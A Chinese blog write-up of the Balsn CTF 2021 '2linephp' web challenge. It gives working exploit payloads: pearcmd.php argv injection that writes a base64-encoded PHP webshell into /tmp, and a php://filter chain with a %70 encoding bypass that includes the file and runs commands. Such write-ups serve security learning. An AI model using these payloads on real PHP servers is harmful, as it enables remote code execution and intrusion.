【Balsn CTF 2021】2linephp 题目复现

最新推荐文章于 2025-12-20 20:43:01 发布
原创 最新推荐文章于 2025-12-20 20:43:01 发布 · 1.4k 阅读 · 39 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

题目

<?php ($_=$_SERVER['REQUEST_URI']) && (stripos($_,"zip") !== FALSE || stripos($_,"p:") || stripos($_,"s:")) && die("Bad hacker!");
($_=@$_GET['kaibro'].'.php') && @substr(file($_)[0],0,5) === '<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.php');

解析

pear是PHP扩展与应用的命令行工具,用于管理 PHP 包的安装、升级、配置及依赖关系,通过$_SERVER[’argv’](register_argc_argv开启时生效)传递参数。pearcmd.php是pear的核心实现文件。在文件包含中,可以利用pearcmd.php远程拉取或本地创建恶意php文件,并进行文件包含。pearcmd.php的默认路径:/usr/local/lib/php/pearcmd.php。

题解

查看环境配置,发现启用了pear和register_argc_argv,由于题目包含的文件开头需要是<?php,可以利用pearcmd.php进行文件包含。

在本地环境中通过执行【pear -c 自定义配置文件路径 -d man_dir=临时设置配置项 -s】创建自定义配置文件,其中man_dir则是恶意代码部分,通过以下代码生成man_dir的值。

from base64 import *

payload = b'<?php system($_GET["cmd"]);'
enc = b64encode(payload) # PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7
print(b64encode(b'abc>'+enc+b'<abc'))
# 运行结果:
#YWJjPlBEOXdhSEFnYzNsemRHVnRLQ1JmUjBWVVd5SmpiV1FpWFNrNzxhYmM=

以此构造第一个payload,注意url中不要有=:

?kaibro=/usr/local/lib/php/pearcmd&+-c+/tmp/shell.php+-d+man_dir=YWJjPlBEOXdhSEFnYzNsemRHVnRLQ1JmUjBWVVd5SmpiV1FpWFNrNzxhYmM+-s

其中&后是利用argv调用命令,+是作为argv的分隔符,在低权限的/tmp中创建shell.php文件。

利用php伪协议对shell.php进行处理和包含,构造第二个payload:

?kaibro=ph%70://filter/convert.base64-decode/string.strip_tags/convert.base64-decode/resource=/tmp/shell&cmd=/readflag

由于$_SERVER['REQUEST_URI']获取url不会对其进行解码,用%70代替p绕过stripos($_,"p:")。

上传第一个payload后,shell.php内容如下:

#PEAR_Config 0.9

a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:59:"YWJjPlBEOXdhSEFnYzNsemRHVnRLQ1JmUjBWVVd5SmpiV1FpWFNrNzxhYmM";}

base64-decode会忽略非base64编码部分,第一次base64-decode后,大致会变为:

#PEAR_Config 0.9

a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:59:"abc>PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7<abc";}

string.strip_tags会从字符串中剥离HTML、XML和PHP标签,过滤后得到:

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7

第二次base64-decode后,得到最终包含的内容:

<?php system($_GET["cmd"]);

备注

这道题不太适合用pear远程下载文件的方式,pear的install命令中,远程地址需要用http://或https://开头,而不能有url编码,这就无法绕过stripos($_,"p:")和stripos($_,"s:")。

参考

WriteUp参考:

https://blog.maple3142.net/2021/11/21/balsn-ctf-2021-writeups/

pearcmd.php利用参考:

https://blog.youkuaiyun.com/rfrder/article/details/121042290

dongloong
关注
CTF】利用dockerfile复现CTF题目
网络空间安全|人工智能|计算机科学
10-22 820
(最后的点不能丢)
CTF题目复现总结-hashcat 1
weixin_42487326的博客
04-03 575
CTF题目复现总结-hashcat 1
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3360
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 3498
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
*CTF2021部分复现
SopRomeo的博客
01-20 1648
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
CTF题目复现总结-二维码 1
weixin_42487326的博客
02-25 1368
CTF题目复现总结-二维码 1
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4776
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
利用GitHub、docker部署CTF-web题目复现
wyj_1216 House
08-07 6159
前言 前面写了kali linux的docker安装以及在docker上部署搭建sqli-labs靶场,这篇文章简单介绍利用GitHub和docker简单搭建CTF-web题目进行复现 学习记录 环境准备 这里有一个非常好的,实用的网站 https://github.com/CTFTraining/CTFTraining 里面包含了很多web题目,利用docker-compose搭建 准备docker-compose 在终端运行 apt-get install docker docker-compose
[红明谷CTF 2021]JavaWeb
Mrs_H的博客
04-08 2798
[红明谷CTF 2021]JavaWeb 一.前言 好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。 二.正文 这道题目上来就让我们访问/login目录,所以我们直接访问试试看。 服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。 这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用
Digital Overdose 2021 Autumn CTF 部分题目赛后复现
Nancy523的博客
10-11 1383
。。。属实蚌埠住了 国内科技公司支持,中东人主办的日本比赛。。osint真的有点 一言难尽跟土澳的比赛对比起来差太多了 官网比赛地址 OSINT: Tour de Japan 看标题 描述应该是围绕这立本来的,,但是结果几乎90%是在Tokyo可还行 1 - Dare enter the mirror world 题目描述: 平平无奇,问了图片拍摄地址 直接yandex识图: 点进第一个链接 往下翻: 题目要求flag2 words DO{Tokyu_Plaza} 2 - The land of
用于备份CTF比赛题目,仅队内复现使用.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
CTF比赛题目复现源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料...CTF比赛题目复现源码+项目说明.zip
对于Thinkphp5可能遇到的保存问题
知码客
12-18 151
文章摘要: 在开发酒店小程序批量修改日历价格功能时,遇到保存部分数据后终止的问题。原因是模型对象$cmodel在循环外初始化,导致每次循环仍保留上一次的数据状态。解决方案是将$cmodel初始化移到循环内部,确保每次处理新数据时都使用全新的模型实例。虽然这类问题在开发中不常见,但需要注意模型对象的生命周期管理,避免因对象状态残留导致的数据操作异常。该案例提醒开发者要特别注意循环体内外变量作用域的问题。
poster自定义海报开发——海报组件开发
freedomhua的专栏
12-17 278
本文介绍了自定义海报组件的开发流程,包括组件定义、语言包设置和前后端实现。组件定义文件components.php需放置在特定目录,支持定义组件类型、图标、属性等参数。系统提供基础海报组件,开发者可根据业务需求扩展。前端需分别实现预览组件(preview-)和编辑组件(edit-),其中预览组件需展示简单效果,编辑组件可调用框架封装的公共属性编辑功能。组件支持自定义字体,需将字体文件存放在指定目录。开发过程中需注意组件路径命名规范,前后端组件需保持对应关系。
Docker 容器(一)
最新发布
youxiao_90的博客
12-20 910
Docker 是一种容器化技术,它使得开发者可以将应用及其依赖打包到一个标准化的容器中,从而在任何环境下都能一致地运行。传统虚拟化需要在每个虚拟机中运行完整的操作系统,资源消耗大,而 Docker 仅在宿主操作系统上运行多个隔离的容器,不需要完整的操作系统,大大减少了系统开销和资源浪费。注意:如果镜像有多个标签,删除指定标签不会删除镜像本身,只有在没有其他标签和容器依赖的情况下才会彻底删除镜像。是一个开源的容器化平台,能够让开发者将应用及其依赖环境打包成容器,从而简化跨平台的部署和管理。
PHP 值对象实战指南:避免原始类型偏执
qq_31470439的博客
12-17 714
本文介绍了如何在PHP项目中通过值对象(Value Object)避免原始类型偏执问题。作者指出常见的日期、金额等概念如果直接用string/int表示,会导致验证逻辑重复分散。通过将领域概念封装为值对象(如Date、Money类),可以集中校验逻辑并增强代码表达力。文章展示了如何实现这些值对象,并赋予它们相关行为,还提供了在Laravel和Symfony框架中的集成方案。最后建议采用渐进式迁移策略,逐步用值对象替换原始类型,使代码更清晰、可维护且符合领域表达。
迪文屏开发-多国语言-只需一组控件
weixin_47347638的博客
12-16 225
现在遇到一个问题就是我要做12组语言,但是,每一组的组件都是相同的,本方法就是一个一个的复制粘贴,可是加起来有几百页啊,我不想,我真的不喜欢做重复的事情。然后现在图标,记住选0.icl,没有0的升级软件版本,然后图标就选你自己的,比如我这里就跟上图一样是50-94。详情可以看这个,但是肯定有些人还是不懂啊,那我就待你操作一下。只是语言不同而已,,图片又有图标,最好分开点距离放。比如我的英语是23.icl,然后我16进制就是17,恰巧,迪文有适配多国语言。(出处: 迪文科技论坛)
Java spinrg 4.x 及 jsp 简单心得(PHP转JAVA视角)
beiliwenxiao的专栏
12-20 276
本文总结了一个PHP程序员在转Java开发中的小心得:1)通过配置文件控制调试区域的显示;2)Java+Oracle对表别名要求严格;3)MyBatis中ResultMap与字段列表顺序需一致;4)提供了Maven和Java命令运行测试的方法;5)国密加密字段需配套添加_HASH和_MASK字段;6)JSP条件显示;7)Shiro权限代码需删除而非注释;8)Oracle字段名长度限制;9)Chosen插件选择器会导致html页面控件覆盖,涉及js交互时,不要使用。
有没有其他语言实现淘宝商品详情API接口采集的方案?
ID_18007905473的博客
12-17 414
除了 Python,淘宝商品详情 API 接口采集还可通过。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值